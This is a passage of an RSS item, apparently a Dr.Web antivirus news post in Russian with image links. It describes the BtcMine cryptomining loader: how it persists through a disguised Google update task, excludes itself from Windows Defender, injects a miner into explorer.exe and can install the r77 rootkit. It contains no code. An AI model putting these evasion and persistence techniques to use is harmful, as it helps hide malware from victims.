      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/january/02_telegram.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2024/january/02_telegram.1.jpg" alt="Trojan.BtcMine.3767 и Trojan.BtcMine.2742"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/january/03_sibnet.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2024/january/03_sibnet.1.jpg" alt="Trojan.BtcMine.3767 и Trojan.BtcMine.2742"&gt;
      &lt;/a&gt;
    &lt;/div&gt;

    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/january/04_itmen.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2024/january/04_itmen.1.jpg" alt="Trojan.BtcMine.3767 и Trojan.BtcMine.2742"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;После запуска загрузчик копирует себя в каталог &lt;span class="string"&gt;%ProgramFiles%\google\chrome\&lt;/span&gt; под именем &lt;span class="string"&gt;updater.exe&lt;/span&gt; и создает задачу планировщика для обеспечения автозагрузки при запуске ОС. В целях маскировки задача имеет название &lt;span class="string"&gt;GoogleUpdateTaskMachineQC&lt;/span&gt;. Кроме того, загрузчик прописывает свой файл в исключения антивируса Windows Defender, а также запрещает компьютеру выключаться и уходить в режим гибернации. Начальные настройки зашиты в тело трояна, в дальнейшем получение настроек выполняется с удаленного хоста. После инициализации в процесс &lt;span class="string"&gt;explorer.exe&lt;/span&gt; внедряется полезная нагрузка — &lt;a href="https://vms.drweb.kz/search/?q=Trojan.BtcMine.2742&amp;lng=kk"&gt;&lt;b&gt;Trojan.BtcMine.2742&lt;/b&gt;&lt;/a&gt;, троян, отвечающий за скрытую добычу криптовалюты.&lt;/p&gt;
&lt;p&gt;Дополнительно загрузчик позволяет устанавливать на скомпрометированный компьютер бесфайловый руткит r77, запрещать обновления ОС Windows, блокировать доступ к сайтам, автоматически удалять и восстанавливать свои исходные файлы, приостанавливать процесс добычи криптовалюты, а также выгружать занимаемую майнером оперативную и видеопамять при запуске на зараженном компьютере программ для мониторинга процессов.&lt;/p&gt;
&lt;p&gt;Антивирус Dr.Web успешно обнаруживает и нейтрализует трояны &lt;a href="https://vms.drweb.kz/search/?q=Trojan.BtcMine.3767&amp;lng=kk"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Trojan.BtcMine.2742&amp;lng=kk"&gt;&lt;b&gt;Trojan.BtcMine.2742&lt;/b&gt;&lt;/a&gt;, поэтому для наших пользователей они не представляют какой-либо угрозы.&lt;/p&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.BtcMine.3767/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;

</description></item></channel></rss>
